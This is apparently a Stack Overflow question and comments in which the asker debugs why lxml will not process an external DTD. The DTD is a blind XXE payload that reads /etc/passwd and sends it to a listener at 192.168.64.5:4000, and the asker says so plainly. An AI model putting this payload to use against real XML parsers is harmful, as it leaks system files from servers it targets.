# XML file referencing external DTD

Tags: xml, lxml, dtd

Here's the XML file:

```
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "test.dtd" [
        <!ELEMENT data ANY>
]>
<data>&send;</data>
```

and here's the DTD file:

```
<!ENTITY % passwd SYSTEM "../../../../etc/passwd">
<!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://192.168.64.5:4000/?%passwd;'>">
%wrapper;
```

When the XML file is parsed, error:

```
lxml.etree.XMLSyntaxError: Entity 'send' not defined, line 5, column 13
```

In the IDE when I first enter the DTD file name into the XML document, both the DTD file name and the &send; are immediately recognised by the IDE.

Here is the code used to invoke the parser:

```
import lxml.etree as etree
tree = etree.parse('blind.xml')
print(etree.tostring(tree))
```

I would be grateful if anyone could explain why the LXML parser is troubled by this.

Update:

If I update the code used to invoke the parser to:

```
import lxml.etree as etree
parser = etree.XMLParser(load_dtd=True)
tree = etree.parse('blind.xml', parser)
print(etree.tostring(tree))
```

(as recommended by commenter [Conal Tuohy](https://stackoverflow.com/users/7372462/conal-tuohy))

Then it errors out:

```
lxml.etree.XMLSyntaxError: Detected an entity reference loop, line 2, column 80
```

So using the load_dtd option appears to give the DTD a sort of 'pseudo internal' status, whereas I am specifically looking to have the XML file read an external DTD (which of course permits the entity reference loop).

Comment: What is the purpose of this? What is the expected output from `print(etree.tostring(tree))`?

Comment: Hi Mzjn, I expect that a listener set up on 192.168.64.5:4000 hear the running machine attempt to send the /etc/passwd file.

Comment: It's hard for us to test something like that. 192.168.64.5 is a private IP address. What do you mean by "listener"? Is something returned? Again, what do you expect from `print(etree.tostring(tree))`?

Comment: If you still need help with the "entity reference loop" error, please provide a [mcve].

Answer (score 0):

I'm only guessing (because you didn't show the code which you use to invoke the parser), but quite likely it's that you didn't tell the lxml parser to load the DTD in which the entity was defined, and the parser's default behaviour was to *not* load a DTD.

See https://lxml.de/parsing.html#parser-options for options which will cause a DTD to be loaded:

- load_dtd
- dtd_validation
- attribute_defaults

Comment: I Conal, I added the code used to invoke the parser.

Comment: Try adding the `load_dtd` option

Comment: Hi Conal, I tried this and updated the original question with the outcome.